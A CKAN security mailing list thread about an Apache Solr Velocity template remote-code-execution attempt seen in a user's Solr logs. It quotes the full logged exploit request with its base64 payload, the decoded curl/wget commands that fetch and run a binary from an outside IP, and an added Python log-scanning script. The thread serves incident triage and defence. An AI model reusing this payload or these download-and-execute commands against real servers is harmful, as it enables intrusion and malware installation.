[CKAN-Security] Vulnerability in the Wild

Adrià Mercader adria.mercader at okfn.org
Thu Nov 7 10:49:13 UTC 2019


@Tyler Kennedy <tk at tkte.ch>
I'm not sure the OP gets your messages if you don't include them in the
response
Good to know it's not harmful




On Wed, 6 Nov 2019 at 20:00, Tyler Kennedy <tk at tkte.ch> wrote:

> This is what it tries to run (duplicate lines are not a mistake, this is a
> script kiddie trying to piece something together so it is messy):
>
> ```
> /usr/bin/curl -o /root/rter http://194.249.0.167/sites/default/files/sync
> chmod +x /root/rter
> chmod 777 /root/rter
> /root/rter
> /root/rter 2>&1
> /usr/bin/curl -o /tmp/erta http://194.249.0.167/sites/default/files/sync
> chmod +x /tmp/erta
> chmod 777 /tmp/erta
> /tmp/erta
> /tmp/erta
> /usr/bin/wget  -O /home/so*/fert http://194.249.0.167/sites/default/files/sync
> chmod 777 /home/so*/fert
> /home/so*/fert
> /home/so*/fert
> /usr/bin/curl -o /var/tmp/etfet http://194.249.0.167/sites/default/files/sync
> chmod 777 /var/tmp/etfet
> /var/tmp/etfet
> /usr/bin/wgetak -O /var/tmp/rtsfv http://194.249.0.167/sites/default/files/sync
> chmod 777 /var/tmp/rtsfv
> /var/tmp/rtsfv
> /var/tmp/rtsfv
> /usr/bin/curl -o /dev/shm/reuer http://194.249.0.167/sites/default/files/sync
> chmod 777 /dev/shm/reuer
> /dev/shm/reuer
> /usr/bin/wget -O /dev/shm/reuer http://194.249.0.167/sites/default/files/sync
> chmod 777 /dev/shm/reuer
> ```
>
> On Wed, Nov 6, 2019 at 1:51 PM Tyler Kennedy <tk at tkte.ch> wrote:
>
>> Hello.
>>
>> This is not a CKAN exploit, but an exploit in Solr allowing remote code
>> execution. It is copied from
>> https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template.
>> Are you sure this actually affected you? You will see garbage in the logs
>> that did nothing all the time as bots try to find exploits. Make sure
>> VelocityResponseWriter is disabled (should be by default) and this exploit
>> will do nothing.
>>
>> Thank you,
>> Tyler Kennedy
>>
>> On Wed, Nov 6, 2019 at 12:49 PM Fabian Fink <fink at h0st.space> wrote:
>>
>>> Ckan 2.8.x
>>> Solr 6.6.x
>>> Solr Logs:
>>>  webapp=/solr path=/select
>>> params={q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('/bin/bash+-c+{echo,ICAvdXNyL2Jpbi9jdXJsIC1vIC9yb290L3J0ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgK3ggL3Jvb3QvcnRlciA7IGNobW9kIDc3NyAvcm9vdC9ydGVyIDsgL3Jvb3QvcnRlciA7ICAvcm9vdC9ydGVyIDI+JjEgOyAgL3Vzci9iaW4vY3VybCAtbyAvdG1wL2VydGEgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgK3ggL3RtcC9lcnRhIDsgY2htb2QgNzc3IC90bXAvZXJ0YSA7IC90bXAvZXJ0YSA7ICAvdG1wL2VydGEgOyAvdXNyL2Jpbi93Z2V0ICAtTyAvaG9tZS9zbyovZmVydCAgIGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyA7IGNobW9kIDc3NyAvaG9tZS9zbyovZmVydCAgIDsgL2hvbWUvc28qL2ZlcnQgOyAvaG9tZS9zbyovZmVydCAgOyAvdXNyL2Jpbi9jdXJsIC1vIC92YXIvdG1wL2V0ZmV0IGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyAgOyAgY2htb2QgNzc3IC92YXIvdG1wL2V0ZmV0IDsgL3Zhci90bXAvZXRmZXQgOyAvdXNyL2Jpbi93Z2V0YWsgLU8gL3Zhci90bXAvcnRzZnYgIGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyA7IGNobW9kIDc3NyAvdmFyL3RtcC9ydHNmdiAgOyAvdmFyL3RtcC9ydHNmdiA7IC92YXIvdG1wL3J0c2Z2IDsgIC91c3IvYmluL2N1cmwgLW8gL2Rldi9zaG0vcmV1ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jICA7ICBjaG1vZCA3NzcgL2Rldi9zaG0vcmV1ZXIgIDsvZGV2L3NobS9yZXVlciAgOyAgIC91c3IvYmluL3dnZXQgLU8gL2Rldi9zaG0vcmV1ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgNzc3IC9kZXYvc2htL3JldWVyICA7IC9kZXYvc2htL3JldWVyIA%3D%3D}|{base64,-d}|{bash,-i}'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity}
>>> hits=0 status=0 QTime=0
>>>
>>> Any version unaffected?
>>> How could we fix it?
>>>
>>> --
>>> You received this message because you are subscribed to the Google
>>> Groups "CKAN Security" group.
>>> To unsubscribe from this group and stop receiving emails from it, send
>>> an email to security+unsubscribe at ckan.org.
>>> _______________________________________________
>>> CKAN security
>>> https://lists.okfn.org/mailman/listinfo/security
>>> https://lists.okfn.org/mailman/options/security/tk%40tkte.ch
>>>
>>> Repo: https://github.com/ckan/ckan-security
>>
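Tyler's point above is that the logged request is only dangerous when the Velocity response writer is enabled, but seeing it in the Solr logs is still worth triaging. As an added example (not part of this thread or of CKAN/Solr), a small Python log scanner flags requests that select wt=velocity, notes whether an inline v.template.custom body was supplied (the actual RCE signal), and decodes a base64 command smuggled through the {echo,...}|{base64,-d} construct the quoted log used; the sample log lines are constructed with a benign command.

```python
"""Triage Solr request logs for the Velocity template RCE pattern from the
thread: wt=velocity plus an inline v.template.custom body, optionally carrying
a base64 command via {echo,...}|{base64,-d}. Sample lines are constructed."""
import base64
import binascii
import re
from urllib.parse import unquote

VELOCITY_RE = re.compile(r"[?&{]wt=velocity(?:[&}]|$)", re.IGNORECASE)
CUSTOM_TEMPLATE_RE = re.compile(r"[?&{]v\.template\.custom=", re.IGNORECASE)
# bash brace-expansion trick the logged payload used to smuggle a base64 command
ECHO_B64_RE = re.compile(r"\{echo,([A-Za-z0-9+/=]+)\}\|\{base64,-d\}")


def decode_smuggled_command(decoded_params):
    """Return the base64-decoded command inside {echo,...}|{base64,-d}, else None."""
    m = ECHO_B64_RE.search(decoded_params)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None  # malformed base64: still suspicious, just not decodable


def triage(log_lines):
    """Return [(line_no, custom_template_present, decoded_command)] for every request
    that selected the Velocity writer; an inline custom template is the RCE signal."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        params = unquote(line)  # Solr logs URL-encode '=' inside values as %3D
        if not VELOCITY_RE.search(params):
            continue
        custom = bool(CUSTOM_TEMPLATE_RE.search(params))
        findings.append((n, custom, decode_smuggled_command(params)))
    return findings


# Constructed sample log lines (benign command) in the thread's Solr log format
_B64 = base64.b64encode(b"echo constructed-sample").decode().replace("=", "%3D")
SAMPLE_LOG = [
    "webapp=/solr path=/select params={q=title:budget&wt=json} hits=3 status=0 QTime=2",
    "webapp=/solr path=/select params={q=1&v.template=custom&v.template.custom=#set($x%3D'')"
    "+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($ex%3D$rt.getRuntime().exec("
    "'/bin/bash+-c+{echo," + _B64 + "}|{base64,-d}|{bash,-i}'))&wt=velocity} hits=0 status=0 QTime=0",
    "webapp=/solr path=/select params={q=*:*&wt=velocity&v.template=browse} hits=10 status=0 QTime=1",
]

if __name__ == "__main__":
    for line_no, custom, cmd in triage(SAMPLE_LOG):
        print(f"line {line_no}: custom template={custom}, decoded command={cmd!r}")
```

A bare wt=velocity hit with a named template (third sample line) is reported too, since it shows the writer is reachable at all, which is the configuration Tyler says should be disabled.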